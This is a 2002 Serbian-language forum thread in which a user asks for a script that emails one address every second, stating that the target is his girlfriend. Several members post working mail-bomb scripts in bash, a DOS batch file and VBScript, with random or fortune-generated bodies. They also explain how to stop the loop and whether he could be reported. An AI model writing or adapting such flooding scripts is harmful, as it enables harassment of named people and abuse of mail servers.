[ Djomloun @ 05.07.2002. 13:28 ] @
Da li neko moze da mi pomogne kako da uradim sledece. Treba mi neka skripta/program koji bi slao mejl(znaci jedan isti) na odredjenu adresu svaki sekund(pricnipilno bilo bi bolje kada bih ja moga da mu unesem vreme razmaka izmedju dva mejla). Znaci ja mu zadam adresu i napisem mejl i onda on poslje mejl, pa ponovo, pa ponovo i sve vreme salje dok mu ja ne zadam da prestane. A program bi bio na nekom shelu.
Puno biste mi pomogli kada biste mi rekli kako ovo mogu da resim.
respect is all, Mladjan.
[ random @ 05.07.2002. 14:21 ] @
Code:

while true; do
   mail sirotaž[email protected] < tekstpungorčine
   sleep 1
done
[ Djomloun @ 05.07.2002. 16:03 ] @
Vidi covek, ne razumem se mnogo u programirenje, uglavnom iskopirao sam
kod(predhono sam namestio sirotu zrtvu i textpungorcine;>> i kada sam
na shelu kucao gcc code.c od mi je prijvio:
proba.c:1: parse error before `while'

da li mozes da mi kazes u cemu je problem?

btw ne moras da se cimas oko sirotezrtve, to je mi je devojka. Spamuje
me SMS pa sam odlucio da i ja nju malo cimam;>>

respect is all, Mladjan.
[ Jbyn4e @ 05.07.2002. 16:26 ] @
Citat:
Djomloun:
na shelu kucao gcc code.c od mi je prijvio:
proba.c:1: parse error before `while'

A ko ti je rekao da uopste treba da kompajliras (gcc)? Koliko sam ja shvatio - to je bila shell scripta...., znaci , vi proba (ili vec neki omiljeni tekst editor, ja bih radije joe), ukucas kodic, snimis, i kucas ./proba, posle toga pratis sta se desava i kad mislis da je dosta prekidas skript....
Valjda sam dobro shvatio kod :), nisam pod *nixom davno nista stavljao od shell script-ova.
[ Djomloun @ 05.07.2002. 16:44 ] @
E tek sada nisam ukapirao sta da radim. Ako sam dobro razumeo, znaci uzmem npr. Notepad i u njega iskopiram kod i snimi kao recimo proba.txt
prebacim na shel i tamo kucam ./proba ?
Mislim dajte ljudi budite malo detaljniji. Ok ja znam da je tebi semesno ovo sto ja pitam, ali ja ne znam zato pitam.

respect
[ Milan Aksic @ 05.07.2002. 20:39 ] @
Kolege su previdele da ti radis u Windows-u a ne u *nix-u.
Da se ne bi maltretirao, jer Windows ne poznajes dobro (cim pokusavas da pokrenes *.txt fajl iz konzole) idi na google, odkucaj mail bomber i skini vec gotov program za Windows. Ne ocekuj da ti neko ovde da direktan link ka takvom 'programu'.
[ Djomloun @ 06.07.2002. 00:26 ] @
PA dobro greska u kucanju za txt, ok? btw zar ovo nije Win userlnad.
[ random @ 07.07.2002. 18:35 ] @
1. Koliko sam shvatio, dečko je još u prvoj poruci rekao da bi to radio u nekom shellu.

2. Nema potrebe za nikakvim editorima, samo ukucaš tih par redova u sh-u ili bash-u i pritisneš enter.
[ MoHicAn @ 07.07.2002. 20:12 ] @
Ili snimis dotican tex u neki fajl tipa mailbomb i uploadujes ga na shell ili ga na shelu otkucas
i uradis
chmod +x mailbomb
i onda
./mailbomb

ili evo ti sve dojajca namesteno
uloguj se na neki nix sistem
kucaj
cat > mailbomb
while true; do
mail $1 < text_poruke
sleep $2
done
CTRL+D (ovo ne kucas nego pritisnes control i d u isto vreme)

onda kucas
cat > text_poruke
ovde kucas ono sto ce biti u poruci a ako oces i subject onda kao prvi red
nacedes Subject:Koji je subject id itd
CTRL+D ( isto kao gore)

onda kucas
chmod +x mailbomb

i onda u shelu kucas

./mailbomb email@adresa timeout

i to'b bilo to.
[ random @ 07.07.2002. 21:29 ] @
Fali ti #!/bin/sh direktiva. Ne koristi svako Bourne shell (čak štaviše). Pored toga, oduvek sam smatrao da je glupo pisati skript koji sadrži samo jednu komandu, kao u ovom slučaju. Možeš i alias da definišeš za to ako te mrzi da kucaš.

while true; do; mail email@adresa<tekstporuke; sleep 5; done
[ Djomloun @ 07.07.2002. 22:53 ] @
Mohican vidi kucao sam ne shellu:
[hepek@tesla ~]$ cat > mailbomb
while true; do
mail $1 < text_poruke
sleep $2
done
[hepek@tesla ~]$ cat > text_poruke
Mladjan, blas
[hepek@tesla ~]$ chmod +x mailbomb
[hepek@tesla ~]$ ./mailbomb [email protected] timeout
sleep: invalid time interval `timeout'
sleep: invalid time interval `timeout'
kao sto si ti rekao, e sada prijavio mi je nesto sa tim sleep sto je islo u nedogled, e sada random je nesto dodao, da li i to da kucam ili sta?
I jos nesto
-kako da posle ovo iskljucim
-i da li moze da se najebe zbog ovoga?

respect

[Ovu poruku je menjao Djomloun dana 08.07.2002 u 01:04 PM GMT]
[ McKracken @ 08.07.2002. 00:08 ] @
Citat:
Djomloun:
Mohican vidi kucao sam ne shellu:
[hepek@tesla ~]$ cat > mailbomb
while true; do
mail $1 < text_poruke
sleep $2
done
[hepek@tesla ~]$ cat > text_poruke
Mladjan, blas
[hepek@tesla ~]$ chmod +x mailbomb
[hepek@tesla ~]$ ./mailbomb [email protected] timeout




Timeout je vreme izmedju poruka.. recimo 1

./mailbomb [email protected] 1


[ Jbyn4e @ 08.07.2002. 17:46 ] @
Citat:
passenger:
Kolege su previdele da ti radis u Windows-u a ne u *nix-u.

Jes, jes, ja gledao skript, nisam temu :(
Za windoze moras da imas neki pomocni program, npr. free sendmail za win:
http://caspian.dotconf.net/menu/Software/SendEmail/
raspakujes to u neki dir, recimo c:\mail. Posto glupi dos nema mogucnost pauze za odredjeni broj sekundi, vec samo dok se ne pritisne neki taster, treba ti i neki od programa (ima ih dosta) za DOS koji pravi pauzu, kao npr hodlit sa adrese recimo
http://www.simtel.iif.hu/pub/dl/40628.html.
To lepo raspakujes recimo isto u c:\mail.
Onda, treba da napravis .bat file pomocu tekst editora i on sadrzi komande:
salji.bat:
Code:

------------------
@ECHO OFF
:labela
echo saljem mail za %1 sa tekstom %2 uz pauzu %3 sek.
echo.
c:\mail\mail.exe -f mail_adresa_ko_salje -t %1 -s adresa_mail_servera -m %2
echo poslao mail, saljem ponovo za %3 sek.
c:\mail\holdit.exe %3 > NUL
goto labela
------------------

znaci:
Citat:

c:\salji.bat [email protected] "poruka koja zeli da se posalje" 5

ce poslati na mail na adresu [email protected] svakih 5 sek., dok ne uspes da ga prekines besomucnim pritiskanjem CTRL+C ili jednostavnim CRTL+break
Naravno, ovo radis u DOS promptu. Naravno, prvo moras da izmenis adresa_ko_salje i adresa_mail_servera u odgovarajuce.
Za vise opcija oko maila (za subject , bcc, i slicno) samo napisi mail i citaj sta ti pise.
Da ne bi pisao putanje do programa - raspakuj (kopiraj) ih u c:\windows\command ili neki drugi direktorijum koji ti je u PATH-u.
[ jc denton @ 08.07.2002. 20:25 ] @
Posto se radi o windowsu ajd' i ja da probam, iako sam nov za Win skripte ...

Prvo instaliraj WSH - Windows Scripting Host, pa onda lepo otvoris notepad i udri :

Dim vreme
Dim n
Dim i

Set WSHShell = CreateObject("Wscript.Shell")

n = 10 'broj mailova

for i=1 to n

vreme = Timer ' marker
Do
if (Timer - vreme) > 1 then Exit Do 'ovo 1 je jedna sekunda pauze izmedju dva maila, pa promeni po potrebi

reply = WSHShell.Run("mail.exe",,True)' umesto mail.exe stavi program koji koristis za slanje maila, mada bi cela stvar mogla da se odradi preko Outlook Express-a, ali ja na zalost ne znam kako :)

Loop

Next

Ovo snimi kao skript.vbs i to je to. Ako te zanima kako da ostvaris dial-up konekciju u odredjeno vreme automatski, pogledaj ovu temu posto smo vec pricali o tome :

http://www.elitesecurity.org/tema.php?TopicID=10777

Pozdrav
[ MoHicAn @ 08.07.2002. 21:24 ] @
Citat:
passenger:
Kolege su previdele da ti radis u Windows-u a ne u *nix-u.
Da se ne bi maltretirao, jer Windows ne poznajes dobro (cim pokusavas da pokrenes *.txt fajl iz konzole) idi na google, odkucaj mail bomber i skini vec gotov program za Windows. Ne ocekuj da ti neko ovde da direktan link ka takvom 'programu'.


Kolege se nisu previdele posto je decko lepo rekao da mu treba skripta za SHELL !!! osim ako ne znas nekog windows shell provajdera ?

PS: da sto rece random fali mi #!/bin/sh na pocetku one mailbomb skripte
PPS: i ovo sto rece McKracken timeout ti je broj sekundi izmedju mailova znaci neki broj umesto toga stavi.
[ Djomloun @ 08.07.2002. 22:16 ] @
Ok, ok, onda bi znaci kod izgledao ovako:

cat > mailbomb
while true; do
mail email@adresa<text_poruke
sleep 5
done
CTRL+D (ovo ne kucas nego pritisnes control i d u isto vreme)

onda kucas
cat > text_poruke
ovde kucas ono sto ce biti u poruci a ako oces i subject onda kao prvi red
nacedes Subject:Koji je subject id itd
CTRL+D ( isto kao gore)

onda kucas
chmod +x mailbomb

i onda u shelu kucas

./mailbomb email@adresa z
gde je z vreme izmedju dve poruke u sec.

btw interesantana su mi i ostala resenja za ovaj problem.

E sada niko mi nije odgovorio na ova druga dva pitanja:
-kako da posle ovo iskljucim
-i da li moze da se najebe zbog ovoga?

respect is all, Mladjan
[ Milan Aksic @ 08.07.2002. 22:44 ] @
Citat:
MoHicAn:
Kolege se nisu previdele posto je decko lepo rekao da mu treba skripta za SHELL !!! osim ako ne znas nekog windows shell provajdera ?
...

Kolege JESU malo previdele a i autor ovog topica, jer se u suprotnom ovo ne bi naslo u WinUserland forumu. U vezi shell-a necu da komentarisem (valjda je ocigledno da radi u Windows-u osim ako nije mislio na neku 'emacs' verziju NOTEPAD), nije tema a i nema mesta flejmu ovde. Sada je nadam se, ovo svima jasno tako da nema potrebe za daljom raspravom na ovu temu.

[Ovu poruku je menjao passenger dana 09.07.2002 u 03:52 PM GMT]
[ Jbyn4e @ 09.07.2002. 14:53 ] @
Citat:
Djomloun:
Ok, ok, onda bi znaci kod izgledao ovako:
cat > mailbomb
while true; do
mail email@adresa<text_poruke

Hm, ne bas, ovo ti je samo za odredjenu (jednu) adresu koju si definisao ovde. ako hoces da moze da se ubaci bilo koja adresa - mora da stoji $1 sto mu znaci prvi argument pri pozivu.
Citat:

sleep 5

Ovde si opet fiksirao na 5 sekundi, ako hoces da sam zadajes broj sekundi - onda mora da stoji $2, tj. drugi argument pri pozivu.
i onda u shelu kucas
Citat:

./mailbomb email@adresa z
gde je z vreme izmedju dve poruke u sec.

Ako smo definisali sa $1 i $2, onda ce ovo sto si napisao da odradi kako treba, a ako koristis ono gde nemas $1 i $2, onda je dovoljno samo sa ./mailbomb - jer si vec definisao adresu i trajanje pauze.

Citat:

E sada niko mi nije odgovorio na ova druga dva pitanja:
-kako da posle ovo iskljucim
-i da li moze da se najebe zbog ovoga?

- isljucis recimo sa CTRL+C, ako nece - CTRL+Z ce da ga suspenduje, ps da izlista procese, a kad vidis koji je PID procesa, ubijes ga sa kill -9 PID (gde je PID neki broj)
-moze ukoliko te prijavi osoba koju spamujes. Moze ukoliko admin primeti veliki promet, pa ustanovi da to nije dozvoljeno pravilnikom. Moze, ali ne mora :)
[ Djomloun @ 10.07.2002. 10:35 ] @
E hvala vam ppl puno, nego sada me interesuje da li znate kako moze
da se resi da poruka koja se salje zadaje od strane kompa tj. tamo gde ja pisem txt poruke komp zada neku vrednost tipa al21serj23asd98, znaci da on po slucajnom izboru nalupa neke karaktere i da broj karaktera koji ce on da nalupa ja zadam npr 100.

A sto se tice oko tog flejma, pa prvo se mislio da sljakam iz wina, pa sam se posle predomsilio(u toku kucanja prvog posta) da radim to sa nekog shela. Izvinjavam se oko zabune.

Mladjan.
[ MoHicAn @ 10.07.2002. 18:17 ] @
Citat:
passenger:
Citat:
MoHicAn:
Kolege se nisu previdele posto je decko lepo rekao da mu treba skripta za SHELL !!! osim ako ne znas nekog windows shell provajdera ?
...

Kolege JESU malo previdele a i autor ovog topica, jer se u suprotnom ovo ne bi naslo u WinUserland forumu. U vezi shell-a necu da komentarisem (valjda je ocigledno da radi u Windows-u osim ako nije mislio na neku 'emacs' verziju NOTEPAD), nije tema a i nema mesta flejmu ovde. Sada je nadam se, ovo svima jasno tako da nema potrebe za daljom raspravom na ovu temu.

[Ovu poruku je menjao passenger dana 09.07.2002 u 03:52 PM GMT]



Cekaj jel ja i random ovde jedini imamo zdrave oci ??????
Ajde sad se lepo vrati na pocetak texta i procitaj rec ili copy/paste u neki editor pa onda grep shell ime_fajla !!!!!!
Ne kapiram decko ne zna i postovao je u win userland a lepo je naveo da ce se skripta vrteti na shell-u !!!! NA SHELL-U !!!!!!

PS: sto se tice zaustavljanja toga samo pritisnes CTRL+C
[ MoHicAn @ 10.07.2002. 19:35 ] @
Citat:
Djomloun:
E hvala vam ppl puno, nego sada me interesuje da li znate kako moze
da se resi da poruka koja se salje zadaje od strane kompa tj. tamo gde ja pisem txt poruke komp zada neku vrednost tipa al21serj23asd98, znaci da on po slucajnom izboru nalupa neke karaktere i da broj karaktera koji ce on da nalupa ja zadam npr 100.

A sto se tice oko tog flejma, pa prvo se mislio da sljakam iz wina, pa sam se posle predomsilio(u toku kucanja prvog posta) da radim to sa nekog shela. Izvinjavam se oko zabune.

Mladjan.



Ne bi znao kako jednostavno to da odradis ali ako hoces evo ti jedna sugestija kako mozes nesto slicno da odradis

cat >mailbomb
#!/bin/sh
while true; do
/usr/games/fortune > text_poruke
mail $1 < text_poruke
sleep $2
done
rm -f text_poruke
CTRL+D

chmod +x mailbomb
./mailbomb neki@email 2

Ovde ti je dva broj sekundi izmedju slanja poruka.
Za ovo ovde ti ne treba da pravis fajl sa porukom vec se fajl pravi unutar ove skripte i to od output-a programa fortune koji izbacuje veoma zanimljive poruke.
Za ovo prvo proveri dali postoji /usr/games/fortune

Primeri nekih output-a fortune-a

talia:~# /usr/games/fortune
You had mail, but the super-user read it, and deleted it!
talia:~#

talia:~# /usr/games/fortune
You can make it illegal, but you can't make it unpopular.
talia:~#

talia:~# /usr/games/fortune
Happiness is a positive cash flow.
talia:~#

talia:~# /usr/games/fortune
I don't want to bore you, but there's nobody else around for me to bore.
talia:~#

itd itd ...
svaki put izbacuje drugu ... samo mi se ja mislim jednom desilo da mi je na slacku pri loginu izbaciu jednu koju sam vec video al to je vec nebitno.
[ Djomloun @ 10.07.2002. 20:16 ] @
Hm... tvoja ideja mi deluje vrlo interesantno M, i mogla bi da posluzi
ali je bedak sto nema fortuna na shelu, tako da prc` u bulju.
Dajte ljudi bre, nemojte sada da pravite war oko toga, ako vam vec
toliko smeta neka admin. prebaci temu negde gde VI ZELITE!

respect is all, Mladjan.
[ jc denton @ 10.07.2002. 21:08 ] @
Ako kojim slucajem hoces da koristis Win, probaj ovo :

Set WSHShell = CreateObject("Wscript.Shell")

n = 30 'broj mailova
k = 20 'broj karaktera u poruci

for i=1 to n

tekst="" 'prom. za sadrzaj poruke

'kreiranje texta mail-a
for j=1 to k
tekst = tekst & chr(int(26 * rnd + 65))
next

' slanje mail-a
reply = WSHShell.Run("C:\WINDOWS\Desktop\mail -f [email protected] -t [email protected] -m " & tekst & " -s smtp.ptt.yu",,True)

vreme = Timer ' marker
Do
if (Timer - vreme) > 1 then Exit Do 'pauza
Loop

Next

Ovo nije poziv na flejm kolegama *nix-ovcima, nego jedno od resenja za Djomloun-a.

pozdrav
[ Milan Aksic @ 10.07.2002. 23:02 ] @
Citat:
MoHicAn:
Cekaj jel ja i random ovde jedini imamo zdrave oci ??????
Ajde sad se lepo vrati na pocetak texta i procitaj rec ili copy/paste u neki editor pa onda grep shell ime_fajla !!!!!!
Ne kapiram decko ne zna i postovao je u win userland a lepo je naveo da ce se skripta vrteti na shell-u !!!! NA SHELL-U !!!!!!


Zaista ne mogu da znam da li imas zdrave oci ali TI procitaj opet sta je gore napisano
Code:

if (TEXTEDITOR & NOTEPAD)
break;
else if (TEXTEDITOR & emacs || TEXTEDITOR & xemacs || TEXTEDITOR & vi || TEXTEDITOR & gedit || TEXTEDITOR & kwrite)
esMoveTo(OdgovarajuciForum);
else
esOneClickDelete();

.... Posao sam od toga da decko nije bas iskusan samim tim i da je pogresio u posanju a kasnije i da je pogresio forum (sto naravno i nije za ubijanje) zato GLEDAJ, ako je decko pogresio i postovao neko pitanje koje nije vezano za WinUserland forum onda je logicno da npr. Random premesti poruku u odgovarajuci forum, jer ja nisam SM i samim tim nisam u stanju da to uradim.
Ne mogu nikako da ukapiram zbog cega se toliko zestis oko tog posta, jer nisam napisao da je neko glup, zatucan, iskomplexiran... generalno nista uvredljivo se u mojoj poruci ne nalazi, zato cu te jos jednom pitati da prestanes da nastavljas ovaj thread u ovom maniru (da zapocinjes flejm i siris negativnu eneregiju) iako to nema veze sa samom temom.
[ MoHicAn @ 11.07.2002. 05:44 ] @
Citat:
Djomloun:
Hm... tvoja ideja mi deluje vrlo interesantno M, i mogla bi da posluzi
ali je bedak sto nema fortuna na shelu, tako da prc` u bulju.
Dajte ljudi bre, nemojte sada da pravite war oko toga, ako vam vec
toliko smeta neka admin. prebaci temu negde gde VI ZELITE!

respect is all, Mladjan.


Pa uploaduj ga ti. Ako nemas neki unixoid pri ruci evo ti ovde
http://www.default.co.yu/fortune
ako ne znas kako da ga svuces probas nesto od sledeceg
wget http://www.default.co.yu/fortune
ili
lynx http://www.default.co.yu/fortune
ako koristis lynx onda ce te on posle pitati dal oces da sacuvas ti kazes da i on te pita gde itd itd ...
samo tamo u skripti promeni onda lokaciju fortune-a znaci nece biti
/usr/games/fortune
nego
~tvoj_username/fortune
ako si ga stavio u home dir direktno!
[ Djomloun @ 12.07.2002. 22:55 ] @
E ovako Mohicna, ne znam zasto toliko komplikujes stvar oko uploada, ja sam skinio fortune i iz WindowsCommander samo preko FTP prekopirao na shell. I naravno izmenio sam tamo /u/hepek/fortune. Medjutim sta,
evo kada sam kucao ono sto si mi rekao:
[hepek@tesla ~]$ chmod +x mailbomb
[hepek@tesla ~]$ ./mailbomb [email protected] 15
./mailbomb: /u/hepek/fortune.txt: Permission denied
No message, no subject; hope that's ok
./mailbomb: /u/hepek/fortune.txt: Permission denied
No message, no subject; hope that's ok
izbaci mi to, posalje poruku, ali je ista prazna, samo stoji [email protected], tj stoji samo ovo kao zaglavlje a poruke nema!? Da li znas u cemu je problem i da li moze da se nekako izbrise ovo zaglavlje ili barem da se izmeni.